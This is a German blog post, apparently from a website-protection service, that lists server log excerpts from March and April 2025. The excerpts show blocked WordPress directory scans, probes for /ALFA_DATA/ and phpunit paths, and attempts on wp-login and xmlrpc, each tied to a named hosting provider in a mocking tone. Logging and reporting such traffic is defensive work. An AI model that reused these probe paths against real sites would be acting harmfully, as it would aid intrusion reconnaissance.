Somit hier nun das Protokoll vomApril. Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

**Protokoll-Auszüge vom APRIL 2025 – Auch dieser Monat fängt ja gut an lol!**

So geht es auch gleich los, hier die ersten Versuche aus den UNSICHEREN NETZWERKE, SERVERN und WEBSPACES! Zu Schutz des Website-Besitzers haben wir die betroffene Website in website*1 umbenannt!

05.04.2025 – AI und versuchter Bilderklau von Fotografien mit Copyright über ALIBABA, dies ist ganz klar eine Straftat:

AS45102 – Alibaba (US) Technology Co., Ltd., Singapore

47.82.22.109 www.website*1.de – – [05/Apr/2025:04:27:34 +0200] „GET /wp-content/uploads/2015/03/Bild1_ready1.jpg HTTP/1.0“ 403 – „https://cdn.shortpixel.ai/client/q_glossy,ret_img,w_588/https://www.websites*1.de/wp-content/uploads/2015/03/Bild1_ready1.jpg“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64“
47.82.17.118 www.website*1.de – – [05/Apr/2025:06:11:34 +0200] „GET /wp-content/uploads/2013/11/Bild2_200.jpg HTTP/1.0“ 403 – „https://cdn.shortpixel.ai/client/q_glossy,ret_img,w_200,h_132/https://www.websites*1.de/wp-content/uploads/2013/11/Bild2_200.jpg“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64“

Zum Schutz des Website-Besitzer haben wir die Domain und Bildername anonymisiert. Das Netzwerk AS45102 – Alibaba mit diesem kriminellen Hacker-Idioten ist nun gesperrt!!!

DER NÄCHSTE HACKER-IDIOT kam über Provider AS8075 – Microsoft Corporation, Dublin!

Der nächste Hacker-Idiot im April kam diesmal über ein Netzwerk von Microsoft. Provider AS8075 – Microsoft Corporation glänzt bzgl. Abuse-Meldung per Email eh durch Ignoranz und Arroganz! Das sehr aufwendige Online-Formular, das wir zu Anfang mal verwendet haben ist ein absolutes NOGo! Da kamen bei 4 Abuse-Meldungen dann 3 mal ein „No ACTION WAS TAKEN! Naja, da scheint das Abuse-Team wohl sehr inkompetent zu sein, oder?

Hier der komplette Versuch eines wirklich sehr dummen Hacker-Idioten über ein Netz von Provider AS8075 – Microsoft Corporation. Der Typ ist sogar zu blöd, einen 403 zu erkennen:

138.91.49.73 website*1.com – – [02/Apr/2025:22:14:12 +0200] „GET /wp-includes/js/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:12 +0200] „GET /wp-includes/pomo/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:12 +0200] „GET /wp-includes/rest-api/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:12 +0200] „GET /wp-includes/widgets/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:12 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-admin/images/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-admin/maint/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-admin/meta/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-admin/network/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-admin/user/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-content/plugins/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-content/themes/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-admin/includes/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-content/upgrade/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-content/uploads/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/css/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/ID3/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/IXR/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/Requests/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/SimplePie/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/Text/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-content/mu-plugins-old/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-content/themes/classic/inc/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-content/plugins/ninja-forms/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-content/mu-plugins/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/Text/Diff/Renderer/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/blocks/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/certificates/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/customize/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/fonts/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /wp-includes/images/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /.well-known/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /ALFA_DATA/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /.well-knownold/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /.well-known/acme-challenge/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /.well-known/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /cgi-bin/ HTTP/1.0“ 403 262 „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:13 +0200] „GET /ALFA_DATA/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /.well-knownold/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /.well-known/acme-challenge/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /.well-known/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /uploads/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /upload/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /admin/uploads/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /Admin/uploads/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /admin/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /images/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /assets/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /upload/image/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /assets/images/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /Public/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /vendor/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /local/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /modules/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /Site/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /system/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /template/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /shop/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /files/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /admin/editor/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /include/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /Assets/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /images/stories/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /plugins/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /php/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /wp-includes/assets/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /wp-includes/Text/Diff/Engine/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /wp-includes/block-patterns/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /wp-includes/Text/Diff/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /wp-includes/block-supports/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /wp-includes/blocks/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /wp-includes/certificates/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:14 +0200] „GET /wp-includes/SimplePie/Cache/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/SimplePie/Content/Type/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/css/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/SimplePie/Content/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/rest-api/endpoints/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/rest-api/fields/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/Requests/Cookie/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/Requests/Proxy/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/Requests/Response/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/Requests/Transport/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/Requests/Utility/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/js/codemirror/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/Requests/Exception/HTTP/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/js/crop/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/images/crystal/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/images/media/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/images/smilies/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/images/wlw/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/rest-api/search/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/Requests/Exception/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/Requests/Auth/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/sodium_compat/src/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/sitemaps/providers/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:15 +0200] „GET /wp-includes/Text/Diff/Engine/Engine/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/customize/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/fonts/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/html-api/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/ID3/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/images/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/IXR/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/js/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/php-compat/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/PHPMailer/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:36 +0200] „GET /wp-includes/pomo/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/random_compat/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/Requests/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/rest-api/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/SimplePie/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/sitemaps/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/sodium_compat/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/style-engine/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/Text/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/theme-compat/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-includes/widgets/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-admin/css/colors/ectoplasm/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /wp-admin/css/colors/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /admin/images/slider/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /admin/fckeditor/editor/filemanager/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /sites/default/files/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /admin/controller/extension/extension/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /modules/mod_simplefileuploadv1.3/elements/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /components/ HTTP/1.0“ 403 – „-“ „-“
138.91.49.73 website*1.com – – [02/Apr/2025:22:14:37 +0200] „GET /admin/uploads/images/ HTTP/1.0“ 403 – „-“ „-“

DER ERSTE HACKER-IDIOT kam über AS20454 – SECURED SERVERS LLC, das ist KEIN Aprilscherz:

SECURED SERVER??? Haha, dieser Provider sollte sich UNBEDINGT umbenennen in:

AS20454 – UNSECURED SERVERS LLC

66.85.157.26 www.Website*1.com – – [01/Apr/2025:04:19:19 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://www.Website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
AS20454 – SECURED SERVERS LLC
Range 66.85.128.0/18
NetRange: 66.85.128.0 – 66.85.191.255
Location: Phoenix, US

Naja, das Netzwerk 66.85.128.0/18 von diesen Provider ist nun auch komplett über unser Sicherheits-Tool auf SEHR VIELEN Websites gesperrt. Es kommt ein klares 403!

Mal schauen, was für dumme Amateur-Hacker uns nun im April noch erwarten!

Neuerdings sind so einige Hacker-Idioten schon vorsichtiger geworden. Haha, da wird nur ein vorsichtiges GET / gemacht, kommt ein 403, ziehen sie weiter. NUR ZU DUMM für diese Hacker-Idioten denn auch das wird SOFORT an den verantwortlichen Provider gemeldet!

Anhand der vielen Logfiles, die wir ja regelmäßig von mehreren Website-Besitzern bekommen, melden wir VERSTÄRKT fast täglich die Hacking-Versuche an die mit verantwortlichen Provider!

Dadurch sind innerhalb von Wochen die eh wirklich dummen Hacking-Versuche drastisch zurüchgegangen!

JA, die Spielzeuge für diese Hacker-Idioten und dummen Script-Kiddies werden rar! *lol*

Diese kriminellen Hacker-Idioten und ScriptKiddies meinen nun, sie sind schlau, Haha.

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Tipps, wie man die Website schützen kann findest du über den Link.

Hacker Protokoll März 2025

Das Hacker Protokoll März 2025

Dieses Hacker Protokoll März 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Dieses Hacker Protokoll März 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

Somit hier nun das Protokoll vom März. Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

**Protokoll-Auszüge vom März 2025 – Der Monat fängt ja gut an lol!**

So geht es auch gleich los, hier die ersten Versuche aus den UNSICHEREN NETZWERKE, SERVERN und WEBSPACES! Zu Schutz des Website-Besitzers haben wir die betroffene Website in website*1 umbenannt!

HACKER-IDIOTEN, Zugriffsversuch über XMLRPC.PHP vom 04 März 2025:

Nach umfangreichen Abuse-Meldungen haben wir in Bezug auf Hacking-Versuche mit der XMLRPC.PHP am 04 März 2025 nur noch einen armseeligen Hacker-Idioten und der kam über einen eh sehr IGNORANTEN und UNERWÜNSCHTEN PROVIDER!

AS132203 – Tencent Building, Kejizhongyi Avenue – KOMPLETT GESPERRT – KOMPLETT UNERWÜNSCHT!
43.153.169.58 website*1.com – – [04/Mar/2025:14:41:25 +0100] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“

LOGIN-IDIOTEN vom 04 März 2025. Es wird weniger, nach unseren ABUSE-MELDUNGEN aber einige Provider interessiert das anscheinend nicht:

AS16276 – OVH SAS
2001:41d0:2:3ea5:: website*1.com – – [04/Mar/2025:02:04:07 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“
2001:41d0:2:3ea5:: website*1.com – – [04/Mar/2025:02:04:07 +0100] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS40021 – Nubes, LLC
207.244.226.212 website*1.com – – [04/Mar/2025:02:58:54 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“
207.244.226.212 website*1.com – – [04/Mar/2025:02:58:54 +0100] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS135423 – Total Information Management Corporation
103.219.70.114 website*1.com – – [04/Mar/2025:03:59:58 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“
103.219.70.114 website*1.com – – [04/Mar/2025:04:00:03 +0100] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

HACKER-IDIOTEN, Zugriffsversuch über XMLRPC.PHP vom 03 März 2025:

AS22612 – Namecheap, Inc.
162.0.232.11 website*1.com – – [03/Mar/2025:04:38:32 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“

AS34931 – Awareness Software Limited
149.255.58.142 website*1.com – – [03/Mar/2025:04:51:54 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“

AS16276 – OVH SAS
87.98.173.252 website*1.com – – [03/Mar/2025:01:01:50 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
15.235.167.214 website*1.com – – [03/Mar/2025:04:54:49 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“
142.44.241.82 website*1.com – – [03/Mar/2025:05:35:52 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS55293 – A2 Hosting, Inc.
103.227.176.18 website*1.com – – [03/Mar/2025:05:05:01 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS37963 – Hangzhou Alibaba Advertising Co.,Ltd.
116.62.176.249 website*1.com – – [03/Mar/2025:05:15:36 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“
101.132.192.230 website*1.com – – [03/Mar/2025:06:35:29 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS26496 – GoDaddy.com, LLC
68.178.153.122 website*1.com – – [03/Mar/2025:05:30:27 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
132.148.178.130 website*1.com – – [03/Mar/2025:05:55:46 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
